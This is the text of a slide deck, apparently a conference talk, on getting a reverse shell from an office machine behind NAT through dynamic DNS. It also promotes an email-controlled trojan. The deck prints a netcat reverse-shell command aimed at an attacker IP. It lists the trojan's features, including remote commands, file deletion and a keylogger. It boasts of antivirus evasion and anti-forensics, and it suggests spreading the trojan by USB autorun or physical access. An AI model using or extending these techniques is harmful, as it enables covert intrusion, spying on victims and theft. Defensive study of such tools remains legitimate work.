SlideShare a Scribd company logo
1 of 48
Download to read offline
Handle Explotion of Remote System
      Without Being Online !!
                 By
          Merchant Bhaumik
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)
Who Am I ?

• Currently   Helping local law-enforcement And Helping
    In Securing Some Government Websites

• Developer    Of IND 360 Intrusion Detection System
    ( Host Based As Well As Network Based Detection )
•   Communicating with Metasploit Guys To Develop Term
    Called “ Universal Payload”
Presentation Flow…….

•Reverse Shell Using Dynamic-Dns Concepts


• Getting Data From Victim Computer Using Email
  Tool
We Will Understand This
Mechanism By Considering
    One Scenario……..
Jack’s Situaion……….
Jack Working In A Company ...............!

In Which All Computers Behind The NAT
BOX……. ………………………!

And He Just Decided To Break One Of The
System Of His Office And Getting Shell From
Office To Home Computer
Problems For Jack….

•Company Has NIDS/IPS ( Network IDS ) …..
 So No In Bound Connections………….

•He Don’t Know What IP Address Is
 Allocated By His ISP

•He Can’t Use Any Mechanism Which
 Constantly Sends Some OutBound Traffic
Good Thing For Jack….



• Jack’s Office Allow Him To Access His Gmail
  Account..N Allow Some OutBound Traffic..
I

# INCLUDE< REVERSE SHELL >
Why Reverse Shell ?
•Reverse Shell is one of the powerful method
for Bypassing Network Intrusion Detection
Systems , Firewalls ( Most Of The) etc

• Because Some of this network intrusion
only monitors In-bound connection … Not
the Out-bound ……

• Jack Has DMZ Network In His Office…..
Diagram 1
                                                   192.168.1.1




                                                                  192.168.1.2
    49.24.3.12                 117.254.4.123   D
( INDIVIDUAL IP )              ( PUBLIC IP )


                                               M                    192.168.1.3

                    INTERNET

                                               Z
                                                                    192.168.1.4




                                                    192.168.1.5
Diagram 2 (Normal Attack ! )
                                                             192.168.1.1




                                                                           192.168.1.2
   49.24.3.12                       117.254.4.123       D
( Attacker IP )                     ( PUBLIC IP )


                                                         M                   192.168.1.3

                         INTERNET

                                                        Z
                                                                             192.168.1.4
Step I : Start Handler
on port 4343
nc –l –p 4343                                                     Victim
                                          Step II : nc 49.24.3.12 4343 –e cmd.exe
Normal Flow Of Getting Reverse
            Shell
                   Exploit !



          Attacker Starts Handler



         Vuln. Injection N All that !



        Victim Sends Reverse Shell
                                        For Reverse Shell Scenario !
        … To Attacker Machine !..



             Attacker Wins !
But What’s Wrong With Jack?



He Don’t Know What IP Address Is
    Allocated To His Computer
 ( Dynamic IP Allocation By ISPs)
Solution….


Attacker Is “Offline” But Still He
     Will Get Reverse Shell
My Way…….
          Exploit !

                               Starting Handler On Local
 Attacker Starts Handler
                               Machine Is Optional !



Vuln. Injection N All that !



Victim Sends Reverse Shell     For Reverse Shell Scenario !
… To Attacker Machine !..


     Attacker Wins !
Flow Of Execution……
       Attacker !


        Attack


    Exe Running in
   Victim Machine                 * If Attacker is not
                                  online still the exe is
                                  up and running in
       Attacker           No !!   remote machine and
      Update IP?                  if attacker updates
                                  DNS records… The
                 Yes !!           Reverse Shell Is On
                                  The Attacker’s Desk !!

   Attacker Receives
    Reverse Shell
Mechanism
• If the Code ( First Part ) receives positive Acknowledgement of
  sending packets …………
  Jack Will Get Reverse Shell…………….




•Else keep running in the victim machine and waits for Ack.
 From attacker’ machine…
Dynamic DNS Way…. (Initially ! )
• First Part    :   catchme.dyndns-ip.com ( 255.255.255.255 )
• Second Part   :   payload.dyndns-ip.com ( 255.255.255.255 )




                      NEW FINAL EXE CONSIST OF


                             First Part                    Synchronous
                                                             Execution
                            Second Part                    ( Single EXE )



                             New.exe
Dynamic DNS Way…. (Finally ! )
• First Part    :   catchme.dyndns-ip.com ( 127.0.0.1 )
• Second Part   :   payload.dyndns-ip.com (Attacker’s IP )




                      NEW FINAL EXE CONSIST OF


                              First Part                     Synchronous
                                                               Execution
                             Second Part                     ( Single EXE )



                             New.exe
Metasploit………….!!!!!
•You can embed my method (or My Exe ) with metasploit Payload which is of
your
 choice .
* The Structure of new Exe will be as per follow :

                       NEW FINAL EXE CONSIS OF


                               My Tool                        Synchronous
                                                                Execution
                            MSF PAYLOAD                       ( Single EXE )
                         ( LHOST = Dynamic )


                              New.exe
Hands On NetWork
                                                    192.168.1.1




                                                                   192.168.1.2
    49.24.3.12                  117.254.4.123   D
( INDIVIDUAL IP )               ( PUBLIC IP )


                                                M                    192.168.1.3

                     INTERNET

                                                Z
                                                                     192.168.1.4




                                                     192.168.1.5
Time To Enjoy Cooked Cookies And

           Recipes !!
Demo
II

# INCLUDE <EMAIL TOOL >
Normal Remote Trojans & Viruses !




    Attacker                        Victim
(Must Be Online !)             (Must Be Online !)
My Tool !!



                          Caution:
                    No Need To Be Online !!
                         Attackers !!


    Attacker                                      Victim

     MAY                                          MAY
      OR                                           OR
MAY NOT ONLINE !!                             MAY NOT ONLINE !!
So, How It Works ??


                  Zombie




Attacker                         Victim
But, Who Is Zombie??
@   It may be one of the below :



         It is one of like it…….



         Or one like this…..



         Or like this…….
Features !!
  Execute Operating System Level Commands By Using Emails !

  Get all Network Card Information with Allocated IP Addresses !

  Live Tracking Of the System being used by victim !

  Get All available account‟ List !

  Enable/Disable Key Logger !

This All Stuff With Gmail , Yahoo , Hotmail………!!
About It !
It is a simple application which Once Up & Going on Victim‟
Computer , Attacker can Handle it using Gmail , Yahoo , Hotmail
Email Services…

There is no need to be Online for Attacker to attack the Victim
System…..

Attacker Has to send attack instructions to Any of the mail
service & then it is like sitting on the door & watching the event ,
                  “ when it‟s gonna open !!”

As Victim Connects to the internet …. Attack Launches & the
results are automatically sent back to the Attacker‟s email
Address…..
Cool Benefits !!
If the email account is used by using One of like below then it is totally Anti-
Forensic ! No Reverse Detection Is Possible !




Create Unique password for all individual victims who are
infected …

Ability to handle multiple clients simultaneously …..

Delete Files In Victims Computer by Simply Sending An Email..

No Antivirus Can Detect Attack Because Of HTTPS ……
Tool Syntax …..

Password_For_Victim “: “Task_Commands”:”

                E.g. Pwd$98$ : Account_info :




 “Pwd$98$” is Password                   Command Which Sends back
 For The Particular                      Email Containing Account Info In
 Victim…                                 Victim Computer !
Snap Shot 1…(Load Attack Instructions)
     Password For Individual Victim




Send Account info Of Victim..
    Send Drive Info Of Victim…
      Sends Mac , Network card Info...
Snap Shot 2…(Get Back Attack Result)




                       Attached Info Of Victims Computer…!
                            As Per Of Attacker‟ Choice



  My Emaill Account …… !
Why Gmail ??
No Fear Of Detection 1
      No Direct Connection Between Attacker & Victim




Attacker




                                                       Victim
No Fear Of Detection 2
No Virus Detection Due To HTTPS…..No Digital Signatures !! Ability To Distruct It
Self…….!
How To Spread This Code??

Autorun.inf by USB Drives……….



Phisical Access Of Victim‟s System…..


During Metasploit Explotion ……
Further Possible Development !!

This Code Is Flexible Enough To Develop Further By My Hacker
Friends….It Is Also Possible For Future To Send Exploits Or
Trojans By Using This Code…….


Any One Can Send Exploits , Trojans , RootKits , BackDoors By
Simply Attaching It With Email And Sending It To His Own Account
Or Account That is Configured In Victim‟ Code………
Pros N Cons 1 ! ( Be Transparent !! )

Advantages are that the attacker never goin to caught if he/she
using the browser like TOR , Anononymizer , VPNs or Any
PROXy…. For accessing the attacking gmail account.

No Antivirus can detect the Instruction data because all traffic
gonna come from HTTPS …..!

Only single email account of gmail goin to use for both the side.
Attacker and victim machine both goin to connect same account
but attacker knows ,But Victim Don‟t !!
Pros N Cons 2

Disadvantage is that , if the victim has habit of checking the
current connections using commands like „netstat –n‟ then
possibility to detect Gmail connection when actually there is no
browser activity. But still it is difficult to detect ………. Because
process is running in Hidden mode….
Hands On Time..!
   ( Demo)
For More……




backdoor.security@gmail.com
Thanks Guys
For Checking
It Out …….!

More Related Content

What's hot

“Automation Testing for Embedded Systems”
“Automation Testing for Embedded Systems” “Automation Testing for Embedded Systems”
“Automation Testing for Embedded Systems” GlobalLogic Ukraine
 
Defeating x64: Modern Trends of Kernel-Mode Rootkits
Defeating x64: Modern Trends of Kernel-Mode RootkitsDefeating x64: Modern Trends of Kernel-Mode Rootkits
Defeating x64: Modern Trends of Kernel-Mode RootkitsAlex Matrosov
 
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Nate Lawson
 
Fps tutorial 2
Fps tutorial 2Fps tutorial 2
Fps tutorial 2unityshare
 
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹GangSeok Lee
 

What's hot (6)

“Automation Testing for Embedded Systems”
“Automation Testing for Embedded Systems” “Automation Testing for Embedded Systems”
“Automation Testing for Embedded Systems”
 
Defeating x64: Modern Trends of Kernel-Mode Rootkits
Defeating x64: Modern Trends of Kernel-Mode RootkitsDefeating x64: Modern Trends of Kernel-Mode Rootkits
Defeating x64: Modern Trends of Kernel-Mode Rootkits
 
Android Custom Kernel/ROM design
Android Custom Kernel/ROM designAndroid Custom Kernel/ROM design
Android Custom Kernel/ROM design
 
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
 
Fps tutorial 2
Fps tutorial 2Fps tutorial 2
Fps tutorial 2
 
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
 

Similar to Handle Explotion of Remote System Without Being Online (Merchant Bhaumik)

Finfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtFinfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtSecurity Bootcamp
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Rootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise DetectionRootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise Detectionamiable_indian
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Shota Shinogi
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux EnvironmentEnrico Scapin
 
DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)Michael Smith
 
Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Angelill0
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12
Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12
Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12Puppet
 
IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 Avast
 
KeyLoggers - beating the shit out of keyboard since quite a long time
KeyLoggers - beating the shit out of keyboard since quite a long timeKeyLoggers - beating the shit out of keyboard since quite a long time
KeyLoggers - beating the shit out of keyboard since quite a long timen|u - The Open Security Community
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoCodemotion
 

Similar to Handle Explotion of Remote System Without Being Online (Merchant Bhaumik) (20)

Finfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn ViệtFinfisher- Nguyễn Chấn Việt
Finfisher- Nguyễn Chấn Việt
 
Tactical Assassins
Tactical AssassinsTactical Assassins
Tactical Assassins
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
How to save home PCs for being Zombies ?
How to save home PCs for being Zombies ?How to save home PCs for being Zombies ?
How to save home PCs for being Zombies ?
 
ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT Suite
 
Exploits
ExploitsExploits
Exploits
 
Rootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise DetectionRootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise Detection
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Dll injection
Dll injectionDll injection
Dll injection
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux Environment
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723
 
DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)DefCon 2012 - Hardware Backdooring (Slides)
DefCon 2012 - Hardware Backdooring (Slides)
 
Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09Rootkit&honeypot aalonso-dcu-dec09
Rootkit&honeypot aalonso-dcu-dec09
 
Antivirus engine
Antivirus engineAntivirus engine
Antivirus engine
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
 
Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12
Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12
Puppet at DemonWare - Ruaidhri Power - Puppetcamp Dublin '12
 
IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018 IoT and IIOT at QuBit Prague 2018
IoT and IIOT at QuBit Prague 2018
 
KeyLoggers - beating the shit out of keyboard since quite a long time
KeyLoggers - beating the shit out of keyboard since quite a long timeKeyLoggers - beating the shit out of keyboard since quite a long time
KeyLoggers - beating the shit out of keyboard since quite a long time
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco Romano
 

More from ClubHack

India legal 31 october 2014
India legal 31 october 2014India legal 31 october 2014
India legal 31 october 2014ClubHack
 
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreCyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreClubHack
 
Cyber Insurance
Cyber InsuranceCyber Insurance
Cyber InsuranceClubHack
 
Summarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatSummarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatClubHack
 
Fatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleFatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleClubHack
 
The Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianThe Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianClubHack
 
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...ClubHack
 
Smart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodSmart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodClubHack
 
Legal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalLegal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalClubHack
 
Infrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathInfrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathClubHack
 
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanClubHack
 
Hacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyHacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyClubHack
 
Critical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiCritical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiClubHack
 
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaContent Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaClubHack
 
XSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiXSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiClubHack
 
Clubhack Magazine Issue February 2012
Clubhack Magazine Issue  February 2012Clubhack Magazine Issue  February 2012
Clubhack Magazine Issue February 2012ClubHack
 
ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack
 
ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack
 
ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack
 
ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack
 

More from ClubHack (20)

India legal 31 october 2014
India legal 31 october 2014India legal 31 october 2014
India legal 31 october 2014
 
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ BangaloreCyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
Cyberlaw by Mr. Pavan Duggal at ClubHack Infosec KeyNote @ Bangalore
 
Cyber Insurance
Cyber InsuranceCyber Insurance
Cyber Insurance
 
Summarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threatSummarising Snowden and Snowden as internal threat
Summarising Snowden and Snowden as internal threat
 
Fatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleFatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep Kamble
 
The Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas KurianThe Difference Between the Reality and Feeling of Security by Thomas Kurian
The Difference Between the Reality and Feeling of Security by Thomas Kurian
 
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
Stand Close to Me & You're pwned! Owning Smart Phones using NFC by Aditya Gup...
 
Smart Grid Security by Falgun Rathod
Smart Grid Security by Falgun RathodSmart Grid Security by Falgun Rathod
Smart Grid Security by Falgun Rathod
 
Legal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara AgrawalLegal Nuances to the Cloud by Ritambhara Agrawal
Legal Nuances to the Cloud by Ritambhara Agrawal
 
Infrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy HiremathInfrastructure Security by Sivamurthy Hiremath
Infrastructure Security by Sivamurthy Hiremath
 
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar KuppanHybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
Hybrid Analyzer for Web Application Security (HAWAS) by Lavakumar Kuppan
 
Hacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish BomissttyHacking and Securing iOS Applications by Satish Bomisstty
Hacking and Securing iOS Applications by Satish Bomisstty
 
Critical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh BelgiCritical Infrastructure Security by Subodh Belgi
Critical Infrastructure Security by Subodh Belgi
 
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman GuptaContent Type Attack Dark Hole in the Secure Environment by Raman Gupta
Content Type Attack Dark Hole in the Secure Environment by Raman Gupta
 
XSS Shell by Vandan Joshi
XSS Shell by Vandan JoshiXSS Shell by Vandan Joshi
XSS Shell by Vandan Joshi
 
Clubhack Magazine Issue February 2012
Clubhack Magazine Issue  February 2012Clubhack Magazine Issue  February 2012
Clubhack Magazine Issue February 2012
 
ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012ClubHack Magazine issue 26 March 2012
ClubHack Magazine issue 26 March 2012
 
ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012ClubHack Magazine issue April 2012
ClubHack Magazine issue April 2012
 
ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012ClubHack Magazine Issue May 2012
ClubHack Magazine Issue May 2012
 
ClubHack Magazine – December 2011
ClubHack Magazine – December 2011ClubHack Magazine – December 2011
ClubHack Magazine – December 2011
 

Recently uploaded

UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAshyamraj55
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdfPedro Manuel
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfinfogdgmi
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7DianaGray10
 
Babel Compiler - Transforming JavaScript for All Browsers.pptx
Babel Compiler - Transforming JavaScript for All Browsers.pptxBabel Compiler - Transforming JavaScript for All Browsers.pptx
Babel Compiler - Transforming JavaScript for All Browsers.pptxYounusS2
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum ComputingGDSC PJATK
 
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdf
20200723_insight_release_plan_v6.pdf20200723_insight_release_plan_v6.pdfJamie (Taka) Wang
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfAijun Zhang
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 
Spring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdfSpring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdfAnna Loughnan Colquhoun
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemAsko Soukka
 

Recently uploaded (20)

UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdf
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7
 
Babel Compiler - Transforming JavaScript for All Browsers.pptx
Babel Compiler - Transforming JavaScript for All Browsers.pptxBabel Compiler - Transforming JavaScript for All Browsers.pptx
Babel Compiler - Transforming JavaScript for All Browsers.pptx
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum Computing
 
